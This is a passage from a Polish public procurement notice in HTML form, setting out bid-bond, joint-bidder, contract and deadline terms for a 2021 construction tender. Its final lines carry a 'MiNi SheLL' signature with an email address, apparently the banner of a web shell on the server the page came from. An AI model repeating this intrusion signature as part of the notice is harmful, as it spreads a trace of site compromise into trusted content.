udostępniający<br/>zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu. 3) odpis lub informację z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru<br/>potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania. 4)pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów opisanych w pkt 3).5) w przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia:a)pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia,z treści którego będzie wynikało umocowanie do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. b) oświadczenie, o którym mowa w pkt 6.4<br/>SWZ(Zamawiający dopuszcza złożenia tego oświadczenia na formularzu ofertowym);6)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami podmiotów (jeżeli dotyczy)2. Wykonawca nie jest zobowiązany do<br/>złożenia dokumentu rejestrowego, o których mowa w ppkt 3) , jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.3. Zapisy ppkt 4) stosuje się odpowiednio do osoby<br/>działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.4. Zapisy<br/>ppkt 3), 4) ipkt 2 stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy<br/>niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości: 5.000,00 PLN (słownie: pięć tysięcy<br/>00/100 PLN).2. Wadium należy wnieść przed upływem terminu składania ofert.3. Za termin<br/>wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego.4.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:1) pieniądzu: przelewem<br/>na rachunek bankowy Zamawiającego: PKO BP Kędzierzyn-Koźle 57 1020 3714 0000 4102<br/>0108 5455;2) gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach<br/>udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310,<br/>836 i 1572).5. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania<br/>wynikające z ustawy Pzp, w szczególności określać bezwarunkowy, nieodwołalny obowiązek<br/>zapłaty na pierwsze żądanie Zamawiającego, w przypadkach określonych w ustawie Pzp oraz<br/>być ważne przez okres związania ofertą, określony w niniejszej SWZ. Musi być wykonalne na<br/>terytorium Rzeczypospolitej Polskiej.6. Jeżeli wadium jest wnoszone w formie gwarancji lub<br/>poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej.7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w<br/>terminie 7 dni od dnia wystąpienia jednej z okoliczności: 1) upływu terminu związania ofertą; 2)<br/>zawarcia umowy w sprawie zamówienia publicznego; 3) unieważnienia postępowania o<br/>udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia. 8. Zamawiający,<br/>niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium<br/>wykonawcy: 1) który wycofał ofertę przed upływem terminu składania ofert; 2) którego oferta<br/>została odrzucona; 3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego<br/>oferta została wybrana jako najkorzystniejsza; 4) po unieważnieniu postępowania, w przypadku<br/>gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do<br/>jego wniesienia. 9. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 14.8, powoduje<br/>rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania<br/>ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp. 10. Zamawiający<br/>zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji<br/>lub poręczenia występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium w okolicznościach wskazanych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz<br/>z ofertą. 2. Warunek dotyczący uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2<br/>ustawy Pzp,zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia<br/>są wymagane. 3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>usługi do realizacji których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt 6.2<br/>i 6.3,wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. 5.<br/>Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi<br/>i precyzować zakres umocowania. Zaleca się, aby Pełnomocnikiem był jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. 6. Oświadczenie<br/>o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu (art. 125 ust.<br/>1)składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokument<br/>ten potwierdza spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu oraz brak podstaw do wykluczenia. 7. Każdy z Wykonawców<br/>wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu<br/>z postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw<br/>do wykluczenia składają każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia(jeżeli dotyczy). 8. W przypadku wykonawców wspólnie ubiegających się o<br/>zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o<br/>realizację zamówienia, są zobowiązani do zawarcia umowy cywilnoprawnej określającą rolę i<br/>zadania poszczególnych Wykonawców oraz zasady ich współdziałania podczas realizacji<br/>zamówienia.Zamawiający może żądać przedstawienia wyżej wskazanej umowy. 9. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe zasady wprowadzania zmian określone zostały w PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-08 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć w formie elektronicznej za pośrednictwem Platformy, działającej pod adresem https://epropublico. pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=f15dda4c-01df-4c59-b90fa767d9826443</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-08 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin wykonania zamówienia. Zamówienie należy zrealizować w terminie nie dłuższym niż<br/>140 dni kalendarzowych liczonych od dnia przekazania placu budowy.2. Przekazanie placu<br/>budowy do 100 dni kalendarzowych licząc od daty zawarcia umowy.3. Okres gwarancji wynosi<br/>min. 36 miesięcy, licząc od dnia protokołu odbioru końcowego (wartość oceniana).4. Okres<br/>rękojmi za wady wynosi 5 lat licząc od dnia wykonania zamówienia i uznania przez<br/>zamawiającego za należycie wykonane (protokół odbioru końcowego).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com